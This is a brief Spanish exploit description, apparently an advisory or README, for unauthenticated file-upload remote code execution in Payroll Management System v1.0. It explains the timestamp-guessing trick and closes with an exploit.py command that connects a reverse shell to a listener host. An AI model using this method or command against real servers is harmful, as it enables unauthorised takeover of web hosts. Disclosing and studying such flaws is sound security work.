

RCE mediante carga de archivos para https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Los nombres de archivo tienen una marca de tiempo antepuesta con precisión de minuto. El script intenta adivinar el nombre del archivo usando la marca de tiempo del minuto actual, el anterior y el siguiente.
Payroll Management System v1.0 permite a los usuarios subir imágenes a través de la página "save_settings". Un atacante no autenticado puede aprovechar esta funcionalidad para subir en su lugar un archivo PHP malicioso. Los archivos subidos se almacenan en una carpeta de acceso público y tienen una marca de tiempo con precisión de minuto añadida a sus nombres de archivo, que se puede calcular fácilmente. La explotación exitosa de esta vulnerabilidad resulta en la capacidad de ejecutar código arbitrario como el usuario que ejecuta el servidor web.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
